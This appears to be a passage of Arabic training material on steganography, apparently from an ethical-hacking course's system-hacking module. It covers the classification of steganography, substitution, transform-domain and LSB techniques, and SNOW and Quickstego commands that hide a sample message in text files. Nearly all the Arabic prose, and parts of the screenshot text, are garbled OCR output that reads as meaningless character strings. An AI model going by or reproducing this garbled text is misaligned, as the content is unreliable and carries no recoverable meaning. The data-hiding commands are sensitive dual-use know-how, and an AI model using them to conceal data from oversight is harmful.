— j — (JLojjI 1 ^.l^a.lj ^UUI ( ■ laJ tiL (j^aL^Jl L_fl Jail J <— ij^ (j^J .J ^ ^1 1^ J l^judJl j& JjjJ^ll ^^>Jl <!Ijuj^)J j^jIuj L_flL* (jlijj 

^UiUij (_^jjuj (JU^jI l_j jLujI (JjjJ J jjj^IVI -^>J1 ^Ia^jjujI tlil l_ flja ci^ u-* 1 (glh^^La ^jj (jl (j^-GJ jll 1 

cJjiall Jl ^1 JLuijI Jl ^H^J V <Lj]a3l £>i& J .dlijliVI 'c-JJjll ^Uij^a' ^Vinn ^ill Jld c5j^Vl jL^ajVI c_j jLujI c>asu cilllA 

; JU3I Jliall Jl .ciL ^UJI Jl^iVI ^jWiun ^1 Vj <4i o^^> 

. JU3I J£^l J U£ ( Mr. Bj Mr. A) '' ^ cl^^ ^ J u'^Jd U J ' ^ '' 1 u^j^ 

(j^>^ uJl j t^ol^dl ojjj^J ojjj^ '--J^^ lilLaJ ]\Jr # A (J^akjaJl (jl ,ClljjljVI A£jjoi Jc ^-J <j^L^JI 4-lJjJl CjLa^a J£ ^J^5 (jl AaJ 

^•l j^1uil/(jj^> >iM (j;!*^ tiljloui ^I^jjojI Jc (Jjtillj lial j (j^VI j .(c-t^l ^— 5 j^l Oj^^) Oj^^ ^ ^>^^^ jA ]\Ir. B 

;^VIS ^ JLua2VI li* 

4JLojj ^LijU Vjl Mr. A 

,AIL ^ t_JJ Jl A ^ Jc IfrllA^JJ IVJl". A (j^akjaJl ^ajlj ^aJ -2 
.l^llAaaj ^ajli ^aJ ttillij Mr. B (J^>^ uJl -ia^.^} L_S jjoj Ujj3 ~3 
.^-liJ tiljjulxJl ^UlixJl ^xi ^"l^)^JjajVI ^1 iklLujl J OJjj^all C-Ajjla ^ ^I^)^JjujIj ]VIr # B (J udll ^J^J -4 

. Jjlill Cj j^JI Sjjj^a ci^l^ ^\^>>>"j ^jij ^ij .REPLY j e-L^j-j Mr. A (j^>^ > f ^l ^ j^j -5 
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Copy Prevention or Control (DVD) it 



.4^*11 ^IjaVlj A^Jl jj^II o^\J^ j^j cAJUll JjL^ ajU^J industry steganography jSaj J^j ^ 

.^Cjudill .111 jJ ^»Uaj ^C^l ^ 4_kjudJ ^jU^. £Lx»U^)J ~j ^ > 

Metadata Hiding (Tracking Information) ^t 

jjjc. jVI l$\ 6A_L<»a^)3l ^1 ^<JI ^cjoij jl ^i<i j t^l^x^JI ^fiil (metadata) ^ ^—^-^ ^I^jjujI (j^j 

Broadcast Monitoring (Gibson, Pattern Recognition) Jt 

Covert Communication ^t 
Ownership Assertion 

Fingerprinting (Traitor Tracking) ^t 

Authentication (Original vs. Forgery) ^t 



Classification of Steganography 

^piiill CjLg jIslxJI ^t> j m £Ju* jIslxJI djUjij J] bliLajl ^jJL^xi {Steganography) ^Ju* eli^l cjLi&i c Vu^j 

. {linguistic steganography)^y^ djUjkJI j {technical steganography) 
<j^ii3| CjLg jlx-<JI ^likl ^j^j 1 aiij 64_l<Jjl!I L-ulLaaVl ^1 laJLujl j 4JLuj^)3l ^liklj ^ j^j {technical steganography) ^°*^ CjU* jLlxJI s-li^.] 



jUUI jl JjLoj jll JSj jl JL^j!^U ^Vi .. n t {Carrier) gi jJI {linguistic steganography) 
.CjLgj1»^3! *U^t ^ULaj i Jalillj t4_iik^3l aJLojjII ^jjj £*^JI AjI C5 ic (77i^ steganography medium) <*-^j1*-aJI e-lLk] .LjuijIa ^-^>*j 



Steganography j 



Technical 
Steganography 



L I 



Linguistic 
Steganography 



3e mag rams 



Visual 
Se mag rams 



n 



Open Codes 



Covered 
Ciphers 



Jargon 
Code 



2 

%^ Null Cipher 

» 

\f Grille Cipher 



■ 

(technical steganography) cr^t cjUj^-aSI ± 
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; JVLS ^$1* U^xj J^-ujj j B 4JLuujll f l&) (jjlaal L-ull ' uVt JjJaJl 4j.il Jill) CjU jLla!) f l&) 

(Invisible Ink) <£>*M j^JI 
# (JjLojjII pli^V c£j^ll jf^t - iklujj l_j jLojVI I^a 

(Microdots) o^J^jJ** - 

.6^1 j <iaij J 4^q>^i lfr*I.VVltnl (j^J jll <L Jail ^ 

(Computer-based methods)>j£^ll J) SaHul^I ljJU&I 

6 jJ,liill <Uajj^l j dll jj^VI j jjj^JI j t(J^a jj^ill J 1 (pi q^l j dlLa jlx-all ^Ia^J ual 

(linguistic steganography) 4-jj*J1I cjUjkal) J_ 

Jc tA jvfflt o!a C qjn^il ^JJ .Sj^UaII (J Jail (J^asu ^\^±*>^(C(lVViev\VCSSCls) <J^ J AJLoj Jl ^J^J ^>*-lll CjLg jl*-xJl ^lik] 

.open codes J semagrams M 
Semagrams -1 

y J 1 U^^^*^ CS"^ ^ t al^aJ <ill,j£ .(JjLulJI jl CjUUJl pli^V 3 alia all CjL»!>lxllj jj^jl L-J jLojVI I^A a laJLuJj 

- ^ => > *alll (jjixil j^LoJjuij 

(Visual Semagrams) (gj**jto u^Ij^Uj^ - 

ajj^j jl cjI jUalll CjUjjoj j Jla 3JLoj j JLoj jV (unmalicious physical objects) * j^l ajjUII dAjjl£It l-jjLjVI 11a ^viun 

_d3jl3y| aSliA Jc £3 jaII jl l_u£-<JI J *^ ja. jaII jj^UxJI ^1 j>» 

(Text Semagrams) c^aUt u^^W^ - 

jjjxj (Jio tAJSUll Ajj^aill <ULaiJI jJjiu jl J^J^ (J^^A 3 4-l^JI (j^aj ^ILkj J L_J jLujVI liA >^ Iujj 

.Ail I Jakj L_J jj£ all (j^aill jl ClAjUakll J 3 alia all CjVlxijVlj Jl J g.1 > gaJJ djULoix^ 4_iaLjal Cjlaluix* AiLjajj 

Open codes -2 

Ja^j j 1 Jll j (legitimate carrier message) ^ -UL^ j J Jl f Open codes 

{overt communication) u^HaII JU^jVI ^il (JI-Lj Ul^l 5JLuj jll J^La. .^^Ull ^ jlSll <^Jal j jj^j V j , Vn >> i^ l/Aijj jll 
^ j '-o yy^y J u^^?^ Open codes '^-^ .(covert communication) cij^t JU-^VI j^^j 

.grille ciphers j null ciphers ^ covered ciphers ^ .covered ciphers j jargon codes 

jargon codes 

tCjLalSajL^iH j tdjIjU^yi ^Aaljujj ^1 j^Vl .^jj^^Vl 1 ^ a& aj V ^jSl j (JjjUII ^ <c ^ 1 g L ajJ (jc ojUc c _^a Jargon codes 
<L^a. Jargon codes ^^^^^^ ^ ^1 .o^^ ^^^^ ^-c- j-a^a! <^ j^-a-« ^^lll j ^ w ^ 1^1 ^^lll ciij^La.Vl j 

.^U^ I^jjj jj Jll CjI jUxJI JjaJ diia. i(cue codes) 

covered ciphers 

Jl ^ jill liA ^JUjjjjj .I^jJIxjjojI <Hjuj^)3I ^lia.1 AjL£ JjoJ lJ&jxj ^J^>^ ui ^l (jl L— LL^ JSUll laJ > >1 jll J Ulc A-ii^-xi AJLoJ^)3| (jj^J Aj3 

.null ciphersj grille ciphers ojj^^ u^jj 
^ Jill cjUja J jll CjUKJI .aISUII aJL. Jl ^kill ^ji^^j ^ill j (Template) ^jl] f^i^ ^ jjII I^a Grille ciphers 

.Ajaa all AJLajjII 

lUIjII t^jaJI Jl Jaill 11 jl 'a ud^Lkll 3_aK1I ik. o^ljill 1 Jlft t ILjoix ajjjaII ^cl jSII <c j-A^ ^l^klajlj aJLojjII J^j Null cipher 

Steganography Techniques ^ULJI * till cjUSj 

^jj jll Cj^IjAxIII ^Ikc; Jl taUU ajju^ j jx^xi dbaj Jl c al^aj (Steganography techniques) jl*^ll djluii 

! J*^^ .yj.^ 1 Aj1aC> J^ ^ ^ ^iAiaJ 

(Substitution Techniques) JI^^V) cjU^j J_ 
<L^I/4iilJa3l djUill JI^jIojI (Jjja (Encode Secret Information) cl^^A\ ji* jj ^1^-aII Jjl^ t^jjljajVI liA J 

aJLojjII ^IjaJLajl ^ i£ aJ AJli ;Ajjjuo3I l_jU» jIslaII ^jjyijJaJ A_i3 ^aJJ Jill ^j£UiVI ^^)xj Jll^ll jl£ lili .Ajjjuj aJLojjII ^ JSUll laJ i u jll ^jxj 

.AjjjuoII 
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(Transform Domain Techniques) l^j*^ ck* 2 ^ cjUSj J_ 
tSlli j ( JSUJI jll) (Ctfv^r Image) jj^JI t> -L^Lk *l j*j J cjU jl^ll *lLkb ^ jL Transform Domain Techniques 
J!* cjI jLiVI J J j^sll A T jL^ J^U ^> cillij The Discrete Cosine Transform (DCT) c^UiSl! ^\^Uu 
I^Aj . jj^l J c£ j^l CjUIaxJI ^j^alia (j^axjj <4-ujll Jc- l^jJa jxl jj*-^ll la xjJ a J^lk ^ Jla .frequency domain 

.lg_La£lj Sjjj^JI Jc jl jjj^JI (j* <Jj£ Jc d£ljj^jll £>1a (j.uIaJ .CjL&^JI .Ua <LgIjj^ jj£I 

Spread Spectrum Techniques ± 

a iklLuJj jll (JIj^jVI (JjLulj ^ .CjVIj^jVI Jc- (JjjjjjaLil! A a 9l£ a j (jlaljjc! (JUuaJ t QJ» - *all 4_Ljal jll J^jJ L_J jLojVI I^a 

^1 jll d jl^VI jU^ijl jUjI ^Lj .CjUjkJI JLuj jV (minimum bandwidth) u?^ j^ll <jUajII J*^ J^VI c> ^L^' * j^V 

CAiLlJ dlL* jlx-<Jl ^I^jJjojV ^Viml Jill ^1 J^VI ^al^Vlmlj (Jl ffiuiVl (j-al JJj i(<JllljUJl (j-G ^Jaluui) ^1 J^VI (j-a ^ (J^jia (JC- 

.Spread Spectrum 
(Statistical Techniques) ^U^V) cjU&U) J_ 
*Ua*ll JjAxj (Jjjla I^a (3^j . (steganography schemes)^^j^-^^ djlkSa^ J '^-l 1 ^j^j I^a ^vimj 

lilli ^aJJj .f-Uaxll J^HJ V LSJ^^I dVl^Jl (J^H J . ^ J] AjjI > (j^ajl > ^i^ll lP 3 *^ ^'diJ-X' <J^ i ^ c - ^ ^Lj^ 

_^jjatj^]| p| t (theory of hypothesis) ^j°^ ^rO^H L — ^-^11 ^Ij^iLui^U ~ ikiLujj _4_Iax-<J! j^j aJaslxJI ^ jU<~ Nf 1 jjj^n 

(Distortion Techniques) cjUjSj J_ 

Cover-generation Techniques 

t^AuJl ^ Aifkj Ia jiac. ^aii LjjJikjl ^^ic <JjLojj3! (JjjUII l_u£ t4 jjj^axJI ^"wax tablet" (jW^ 3 ^ ls* ^ cJjLuj^>1I 
I ^ > lajj <JLojj3l (jiil jll (3^- ^^ >f ^ j <til3i Asu l^S j3 Laj ^ill ^j^JI IaUoc. t "Histiaeus"^ 

C5 ic <jJaj^)L<Jl J J^J t«^*Sl J-^ (JIa 6<auJalj L_J jJC L_J jLojVI I^A -C5 jujjli3l (jC (JJ^jU jJI 

^a^C tilli ^J^J .6^1 jll <C jflaxJl <aij^all Jc 4 alia {typefUCCS) <— AjLa^lt L>^ 6£jUaAlJ JjVI J 

(JiLd i^qVj's a\\ L-fljLa^ll ^j-d (j5^l jl) (j^l ^lAaajujlj Ajia ^ <!Lajj ^jl (ja-^j ttillil j ^AjuUall L_fl jj^ll (J^su ^ Ajfll^ ^cjoij J ja j 

# JjIaII jl ^^Ixll ^ jill caj^jd 

4ijj JjLojj Jf^- aI laJLujl j oIxjoj j^Ja Jc <jjj£>Jl (JjLujjII (j^axj Ajjoijjill 4^jlLJl dilaijl 4_ijliill 4_ia31x1I L_JjaJl j!>La. 

(JjC- <£Ll2kJ (JJJJJ-« ^jfljolJ <Jjj£-G (JjLoJJ .C5J^-VI cJj^jll L>^ ^13^^ C5^>^l L^-^J ^— ^ 6 C5^ ^>f^ ^1'^*^'^ ^J^-* 

-C5 cLuJl l^jlijj Jll ^jjdJ^LJl ^ AjtiaS J 6A£la^ll A f laall cClllaJa 

<J lllilll CjLd jlst^Jl ^lia.1 J^Loui (J^flaJ ^5ja.j lA-li udll L-li> al jaJl JJ^Ja ^ 1985 J 4jJ.laJl CjU» jlx-<Jl ^lia.1 CA JU&l ciAl^ 

m A^\lA\ JljC. jjlsuluJl diLia^jJ AaLa aJalaU tlgi^Uajl ILd ^jSl j tllllaJ ^jl£ tilli t . lV> I ^ill jjjajll ^jl J^jW 
jj^all djliLo jl jjul^ll jjj^all A_iaA 
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^.l^xJI tit UiLdj <jjt jjujc jiil ibjLlA jj^j ^3 jj One-time pad jit S^J! jl Jl* ALla dit jLuJt (^t jJui*Jt 

. ("private key")<j-^ c 1 ^ 1 ^ v 

.dl jj^all t aL ^ ^Jj^alt J^^*^ ^li^VI 
.Cj jj^alt t aL ^ ^Aj^al) J^*^ ^la^VI 

m Jalill L_aLJ Jajuj 4J-&^ '^ S H a aLo^t ^Laaal CjIjUJI ^jj ^ > >i1 

^^HaII CjI£jLu1a11 j jjj^iyi ^j^t lS^-^jj 6CjL<J^3I ^jjIj j J AjjlaJt (jjl c-Hajlt lJ*^ 

^aulS t Cff £la>^Ul j ^^^LaJI JL^ajVl ^ I^J^Ljj (j^j <^jJt "steganogram" 4-^^Jt CjLg jl*-<Jt ^JalL> JjLj dLjaj* 
c_ii3LajVI Jj^^ .2003 ^ jj^ 1 ^j^j^" i> &i$J ^l^kiait Jjl . "network steganography" 

a£jjoJI ^IjC. jjlJuluj tA-ii^xJl djUUill £.Uai£ (jjjjilt j dl jj^Jt j jjj^I! dAiLa) 4_La3j3t lajl > o jit ^t jC. jjUulaJl ^Viml ^^jll <j\iMt 
Igic c aju&lt L. la > ^il C _^A l_u3LojVI *>i& ;ciI3i3 A yf" j .AjjuiLuiVI j^Jt t la jJtj dVU^aj'Vt dV j£ JJjJ^ ^£^j3I jj^alic a iklLaLj 

11a (j^flaJ (j£*Jj . JJ*Jj J^^t 4£jjuj J j£ jJjJJ (j^ajU^i. lS^-^ J 0 J*^\ A£jjoJ| ^IjC. jjUuloj L-lilLojl J^ajj .l^Jc ^Ljakllj 

J 0^5! <a^l*J! c> ^lil^VI o^uJI (>a ^ s .(JjSjj jjJ! cjUU j) PDU (Protocol Data Unit) l^^I 
.(inter-protocol steganography)^^^ cjLLfkil! d^a ^Sj .ajjjuJI dsVl^VI <illL^3! 4£fxi3l cjV j£ jj jjj 

. (Voice-over-IP)^^^ J jJI ^U^j- ^1 jjUjIuj 

t4_jjj£i3l (JjLuj j3U tVjl ^(plaintext ^j^^ l>^) '^-^j ^ j« cJ^j J uj^ ^ C5^L>^ J^J^' *-njqJi ^^>^^ 

(j-ajll 6 jiAJI oajll *\ j^V (cover text) ^Uac; (4j 6 ^ .ciphertext jaA^l o-^^ 

L_lJLajVI .AcUkll <LIS L-bou] tAj-dSjll CjUi jIx-aII ^ILk] cJj^J J ^ill jiui^ll (j^aill .(stegOtext) ^aa^ll <!Ijujj11 jl^Jl 

sUa c alftll J^j^ cj' c . 1 >j 6 I^a Jc 4<JLajj3l ^ILkV sUSlI c aLill J(noise) j^all Jc axuxj AjjJlill ^j-aijj]! 

.(ASCII Art Steganography) j* <a5II ^ J cr 131 ^ ^ b ^ 

^Sjl) Q^aU) -5 

tit .CjUi jlx-<Jt 4_jaLjat CjUL J-<^J Igit tAjx-nia jJfil DjUix-<Jt ASCII ^ J^? a ^JjaiJ lij^a^ J j^JJjJ-^t jC. jjUulLoj a laJLujJ 

allai ^ cJ^^ J^^^t ^pa^su t4^<JajVt (J^axJ tcilli ^ j ^jlxJt (J^ailt qC* ^jj^j (JJ^ tilUfc (jj^J (jl^ t^j^ > ^> cJ^*^ C-H^t ^jiajC. 
^ jj^ L_jUi!>lxi3 jj£l<Jt ^atjjkjjojVt t(*6 JaJjaJt L_fl i^il^j A-ii^xJt L_fl J^pJt t^^kt <^J> > nj AjiljJaVt CjUi jlstxJt Jj^J ^JJ > n j 

jjjj* ^jt (JjJJ t^ailt (jla ^Lii^. CjU» jls«-<» t flJ - (jt (j^J 6(4jJ^xJt L_flj^pJ3 <Jjou31j jj£ ujjlt 4 JjUJtj t^ajoixJt c^J^liJt L_flj^pJt 

c_jjjii3t L_jUi!>lc. j AjflLjal (blank spaces) ^ djliLai^ ciiti LijUuisu Jc t(jJXML) c5 >^ 

Ajilk Jc (J^aJjt (J^aj j& <JaLoiJ jj£t (JULo cilLiA j ,l^jJajC JJC Ajj^ (JJ^J (jl ^^t j t^L^^Vt j Ja Ja^Jt j 6<illk-<i ^jt jit til3i£ j 6^)JajojVt 

"selecting". &jjj^j ^ c-L ui Sj jl c jSaj ^tj ^^Liajj 
« ((ZWJ)zero-width-joiner)' (non-printing)^W^ ^ j^h ^ jj^ ^l^i^l Jj ^i^j LjJLaVl dIa j^t 

^ l^al^aujuil jSaj t^jj^xJt <illt J ^jj^Jt Jx^j Jx^ajl j^Vt .(ZWNJ) (zero-width non-joiner) 

.l^jJajC- ^jj V JWUj '^iiii^t AJJ^Vt J IgJ ^gis^ V CIjU jlxJt ^ILkV jjlt A^U^Jt jj^Jt 

jSjjj^ui JUL!! ^ti^Luut -6 

Jjlsu tiAj .1021 X 6.71 LS^t J 'J^J^J^ 3*^ J jkJt jjij ^tlilaJt ^ JJJjJt tSlllaJ jSjJjjoj jUJVl ^tj^klojU CjU jlstJt 

.dij 56 ^ ^ikloj ^iJt DES 4ij jia jjSIj ^ jSl Ig-Wj Lu» tdij 70 Jt 
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HOW STEGANOGRAPHY WORKS 



jjj^all dial* jic cilli ^jj \^ iKrt ^ ^uiLxJI djULiJI t^^ajll a\\ (Js^\ ^fiL^\ Iujj Steganography 

<C a£ JJ jJJ*£3l jt$J> jjj^II (jjj^J ^aJJ .CjLg jIslxJI s-lik] 4-jl*-^ (Jl*-^ J ^ J^ 1 J^VI ^ CllaajL^ai 4_i*aj3l jjj^II <J^.b 

j-o j las j Sjjj^ c aL> ^ <Jjuo£j1I j* <c a\\ cifc <jj j^j* ^jj .Cjj 24 8 J Jj^ 1 ^ J^-^a*J 6<Jjuo£j3I CjIji^ j j* 



Cover I mage 




0 ^ 



EC-Coundl "Hackers 
are here. Where are 
you?" 



J 



f 1 

Embedding 
function 




Extracting 
function 



St ego Image 



Cover I mage 




EC-Cou nci I *H ackers 
are here. Where are 



Types of Steganography 

SjU j ,<!ljajj3l j j^-j (j* ^Jzjxj ^^alLJ! jjc. ^.1 V <Ljia3! £>i& <J1* 4_jik-<J! <JjLaij3! ^alc j ^jfl j& Steganography 

4j.uiL.uV1 CjL* jlx*ll s-lik] .CAjLjII s-lik] (j£**ll ^ u ^1 fiJJJ^ll CliLi^ j] ^j^lil £* 4_ijjjj£3V1 ClllaLJ! ^-j - ^ SjjI jj*l! dl*l,J^JjuiVI 

{document making) jfl .(document making) jfl j (data hiding) ^la^j :u^W^ 

. (Fingerprinting) ^ ^ > ^ l j (watermarking) CjU^UJI ^ j^VI ^ j .^uJi/5JI jVI ^ ajU^J! ^ 

:^Ult jaalt ^fe Steganography <> ^iHa^ ^IjSi ^ 
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'Data Embedding Security Schemes" ^UUJI £#a^ <>l cjtLkL* 



. "channel robustness analysis jp- sUS 311* ^ u j* > ^ t ^ jjl jblkl o^jj <c_iVUJI ^Jm* yi 

c flllai ^ .(JjLoj^)3I ^jj^uJall key scheme" '^^^ * * ^Ia^LuJ JIjc. jjUuloJI aAlL* (jj^vi Jc <J-g*j ^31 s.^) j 

u '^ Vl J j£jA *f^fi\ \ <^ *^Uj ^2 .<ul.ikU jjlkj ^LojI Jc t" £ey steganographic system" jl jc- jjli^ 

C-jjau] Jl jC. jjUulaJl ^Uaill J*Ull ^j£3l J)j'qVil a jblkl 4 (jli jUlLj ^nti ^Uail 4(_£^j!i3l JjUaill (jlajC 

^I>lkj Ui\ (j^-GJ 4 JljC- jjUuluJl <itld ^JJjud^j] .^llLo ^I^JjojI jl ^ULd ^|>lkj nil (JJ«i (JA JljC. jjUulaJl ^Uaill J <JjLaJ^)3l A \ >~l\ 

CjUJl (JjuAjujJ (Jj£ nil A-ijl^a.] Jc JjlJU J t^JjL^. <Jkb <ULaJ^)3l (jxi dlUj (^5^ J^lj 4-1 UJ^ l£^J ■l5^ > ^ J^J^^ ^"Uixi 

Ajla jjl ^k jblkVI ^ _Ja3ifl. (jj-ajJallll jjl ^k jblkl ^J^)la (jc <jl ^ II (JjVI (_£ jlluixJl ^*1^J ^JJ _4_LdjJa>Jl <!Luj^)3I 

'(spatial-temporal) 4AjjUj1I-AjjISJI <4jjUJI ^L^k Jja*j Cli^jjl^k jl t (££#) {least significant bii)(^^ <jVl J^*j 

(C) <3jUI ^ - 

(F)(^ jll £j! JjSJ lS^j > jjUnmlt lSjAxjII 

(SC) ^!>^UulJI - 



m — 1 



SS (1 st protection level) 



(c A ) JaslJI L_aL 

J^Lk (jjuJ! ^ULd ^l^klojb tUkSI <jU^JI CjU > '1 ^ ^ ^-v ^jc ^LjaS ^31^0^1 * jj > oil ^liaill 4jLa^ ^^Lolq ^aajj 

jjjj V *>i& ^UL<JI L-jl ^>^->^ ^ JiLd jc. jM auludU alia <J jJa ^^Jc. <-<i!)lc jjj j! ;4_ILuj^)3! JLojI jl ^^^Jcl 64_Ia*^<J! 

. JjVI ^U^JI 

^likV 4_LdjJaxj aJLujj ^JlxJ jl/j 'Ajjl^Jl cJ^-^- '^l^ ^ liLujj t^ULoij ^jjJ ^ ikHujj Jljc. jjl auludll dlULiJ CjI y& 

J£joJI .AjjL^JI J!)lk 4_Iljai^)3! jjj Jc JJjJ A-Lk ;L_Jlii3l <jl <L^Ji ^5 jlLubG ^-Uixi ^Uaj ^l^klLojl ^jj La^jc CjUUJI 

V*n^> ^ClJlIill AA a^W jlaixi 

J^b <JLojj3 ^Jjj a!\^ - F(P, L) 
: ^3! J^ J ^F(P 5 L W 

F(P 5 L) = cycle*L + step*P 



.^ixijjaJI 3JLojj3I khc ^Sj (step) 6 j 6 Lc^^^ ^JaLJl ^Sj Sjjj (cycle) 

Q liA .<JLojj AliC £3 ^ jblkl (jc 5J jjjoixj F(P 5 L), AjjI^II J, G(Q 5 N), ^ ^ J aJ^J jblkl (jc J jjjoa-d 

# (^j|^)3l aA ^ jl^iA ^>^>^ a (J£juo1I ^>^l) a-!Ijuj^)3! t aLa 6^.1 j ^j-<» (ciulU) a N-W^U^l aJLuj^I ( 




-f*\ SC \- 



F(P,D 



I 



SS (3* protection level) 



SS (2™* protection level) 

^JSl ^^aJ 1 Jji-U Jalaaut - ^2 l jD ji'jLJJ^l ^'Ju 
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4 



Whitespace Steganography Tool: SNOW 



Jl j CjlaLouJl . jiajoaVI g-i »l > ^nll CjlaLaiJI jj^iaj J!^U. ASCII y?* d^jll ^^lun SNOW j-^jj 



Mm i ni straton C:\Wi nd ows\system 32\cmd .exe 



D:\CFH-Tno In \CFHvR nodule 05 System H ack ing\Uh it e space Steganograplty Tool\Snov\s 
n*#dos32>snou -C -n "This is a test for- Whitespace Ste gano graph ]/ using Snou" — p 1 
Me Icon" teet.docx snowoufc.docx 
Compressed by 41 .90* 

Message exceeded available space by au^ruxinate ly 340. 35;<- 
An exlrd 7 lines were added. 

D:\CEH-Tools\CEHu8 Module 05 System HackjngsLNiitespa.ee Steganography Too l\Snow\s 
rtudos32> 



3 



ii ttp://www. darkside.a3ni.ati 

.snow cSjj^^I cs-^* csj-^ ^V><ftll ^1 JliiiVl ^2 (cmd) jj^jj^W (j^^JI jV( ^ J*-*^ 

icPVIS readme.txt ^ U-^h ^jSj ^ Hello world ^ ^ ^i-^j f jfc 




snow -C -m "My swiss bank account number is 45656684512263" - 
p "magic" readme.txt read me2.txt (magic is the password, you can 
type your desired password also) 
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Administrator Command Prompt 



"«\CFH Tonlsvc:rHi*a nodule 65 System HachingvstccfAn(igrapby\whitc 3 pace stcg&nogra 

,■ h^NS nohi>s now — C n "fly -iwiss bank account: nunb« i* Is 4565 fi 6845 1ZZ63" -p "nagi 
; " re Adne , t x % re adne 2 , t xt 
innpressed bjy ^J.JVk 

icss^gc exceeded available a pace by approxir»At e ly G71 .43h . 
}n extra 8 lines were added. 

i= ^CEH— Too 1sVCEHv8 Module 05 System HackingSste ganographyMjJi it e space steganogra 
jhy \Snow> 



^ull l^L My swiss bank account number is 45656684512263 Lj* g^tj ^ ^ 

l^LJI ci^ta lS t_aLJI lSj^ ls^ j readme2.txt ^UijU li*a ^5 readme.txt 

Snow -C -p "magic" readme2.txt 



Administrator, Command Prompt 



E :XCEH— Too Is VCEtfuS nodule (55 System Hickin^Vst e cfanojjrajjJi yMih it e space steganogrii 
phy \£imiw>3 now ~C — n **Hy suias bank account number is 45fc56kB4tl 2263 " — p v ftncf i 
c" eeadne _ txt Kadne2.t)tt 
Compressed hy 23. 37k 

Message exceeded available space by approximately 571.43m. 
An extra 8 lines were added. 

E : \CQI— Ton 1 r, NfrFHuft Mnrhi 1 r Rust Kn H^irkin L e gran o g rap )i y Nvih it e space steganogra 

phy ^Sno w >s>QW — C — p ' 'ma gric 1 " Re adme 2 . t xt 

My euIee Jbdiik AL cuunt n unJb*: t- ic 4'j b t> U 1 ^ 'Zf» "J 

E=xCEH-Too lu\CEHufl Muiluly @5 Eva ten Hachingxsceg^ogpai)h*/\uhitB spw> steganoyi-j, 



Edit -> Select all ^ notepad jj^W readme2.txt ^ GUI ^ 

.TABS j ^La^ ^ ajjjoJI yLujjll 



Image Steganography 



<^.LaJl (jc saj! jll dull ^ s^liluiVl a) c— /ojjj^a cikta tiL 4 > ^al ^11 t^l Image steganography 

CIl^IjAxjII .IgJ jjlxJ Cj^. lij Sjjj^all C5 Jc 1^ cJ^^a J£^J ^JJ^^ LS* is^ ft^jljll bits ^-A^JI .l^i^l^J <ULojj3I ^ILkV ojjj^all 

BMP j JPG j PNG 5iiLk^ cjlqjmn ^ jj^Jl J^b ciL cjU jIslJI ^ILkj t*lsS^ .<J I^jc < LSSII ^ V CjIiJI ^Jc 

^islSU (j^J V Ia jjjIj (Jj^J C-U^ j <9j^)IaJ l^jl Q^j 4JLuj^)3I l^-l^Q cJ^^ aj^-iJl ^-J^^ ^ *^^^ ^—^^ P iklLujj 
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Image domain :o^j^^ J) h^y^ c£*i (Image Steganography Technique) <-l*^ cjUjkJI cjUSj 

.transform domainj 

. (intensity of the pixels)L^ ^ s>Sb* Vv*^ ^ 'Image (spatial) domain <^ 
.s jj^J! ^ J! f^^ ^J jj^JI Jjj^ ^ transform domain (frequency) ^ 

.(Least Significant Bit Insertion) ^llJt <> oh^I I 
.(Masking and Filtering) s jSlill j 
.(Algorithms and Transformation) Jj^j Cjl^jjIj^JI 




Least Significant Bit Insertion -1 

i> jj^t cjUjIx^I ^u v^mM l cjUj^I JSI <> The Least Significant Bit Insertion technique 

^1 LSB A Sd^> ^ULuL J£l [Least Significant Bit (LSB)] lU^ ^ JS! ^I^i^l J^k 

l^Ull j^3l cs^ uj^ u' cs-^ j ^aUJI ajjjoJI dAiUJ! <iu 24 lp^I ^ ^ o^J^ 

(00100111 11101001 11001000) (00100111 11001000 11101001) (11001000 00100111 11101001) 



US Ci> 24 Sjjjuall "H" ^ AtA* 
^UJ! jUll j^i cil^ ,"H" liA 01001000 ^USH ^ jVl <^ "H" ^ 




jjis j^i ^UlUj Sjjj^all c kL ^ dij LSB ^^"^1 ^ j'K^I ^ j^auuJI jla t j^Vl ^rKll ^ H ^ ^bjluaV 

Masking and Filtering -2 



^1 c> ^£11 V ^1 o^^J CjI j^3l ^> j;!^ Masking and filtering techniques 

(jiasu ^ laJLujjj '(jjjJl (^^-Sc 4_jjUJI CjU»!>IxI3 a * jl uj a <L^)Iaj djUi jlx-<JI ^likl (Gvayscole images) a^^^J^ ^ (j^j .4 m ^ 
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djUjij ^ J£ . jj^t W*-^ j c&j^ 3 ^ ^j^aUJI ajjjuoII dAiUJl *U^L till ^joij The masking technique 

ciuli ;<jjjuJI (JjLojjII ^ILkV .AjjU j3) jj^Ij jj-^JI ^ Jaj^-J£J-Cjj-24 s^-*^ ^^^^ filtering j (^-^i) Masking 

*tik) jli t^UlUj . jj^Jl ^ ViT t ^l t j £ jjll CjLLc {j* Ujjaij 3 jj^i (s jjj^JI ^ Jx^JI * jaJI) Lossy JPEG .JPEG 
Steganography Image * . .{Masking technique) ^bViuiU Lite fi> Lossy jpeg *>Jt ^ ^ j 1 *^ 

.Sjjj^II (j-a A > <al Calais ^ ol <^ <ULaijll 4j3 (jj^J ^5^1 j JPEG ^* > ^ (j^'N \a <Jax-g diUi^lc. £jJa j <iajuil jjq*n\L 



Masking and filte 
techniques are gene 
used on 24 bit and 
gray scale images 



The information is not 
hidden at the "noise' 
level of the ima 





asking tech nique 
ng a method similar to 
atermarkson actual paper, 
and it can be done by 
modifying the luminance 
of parts of the image 




Ma ski ng tec h n i ques hide 
information in such a way 
that the hidden message is 
de the visible part of the 



Algorithms and Transformation -3 
y?* s jj^ t> ^ The algorithms and transformation technique 

. (Transformation function)dj^ ^^jj <atLLJI k^Jal l djU^jjI^k (j^flaj J^lL ^ s jj^all CjUjkJI *tik] t^ujiill 

<JjuAla ^ JPEG JJ^^ ^ .jy^ JaiuJa *L5i JSi J-gL-a AjjJaUj 5Jb ^Vimj J j^ill j Jai-jJall A^jjl ja. 

JPEG JJ^^ .^J^^ ^--^-^ ^li^.] (j-<i cJ^- jH-'-'H ^ J^J^ S- 5 ji^VI I^A _4 allai ^ jnir > djUjlaui 1 g hq^> 0^-<^ JaijJaJl 4_iLoC 

.JaiuJall 4_iLftC ^JjI^j] <L gaAla COSine * ** 



; J aLia Jjt ^ <^ia^L noil JjaaJ! CjLuSj ^ £j J^l Aj^Ij dUA 

Fast Fourier transformation 
Discrete cosine transformation 
Wavelet transformation 
Image Steganography: Quickstego W 

http : / / quickcrypto . com : j^-a^ll 

ajjxJI JjLoi jll 6^1 jSj jU t> Quickstego^^^ clA^ ^ '^jy^ jll ^ ^jQuickstego 

uj^ o jj^ > ^ AiLjaU ^jjoJI (j^ail! jjq ujj tojjj^ll ^Lp^il! Sjjj^ll j > ^al ic ) ^Jj k Quickstego 
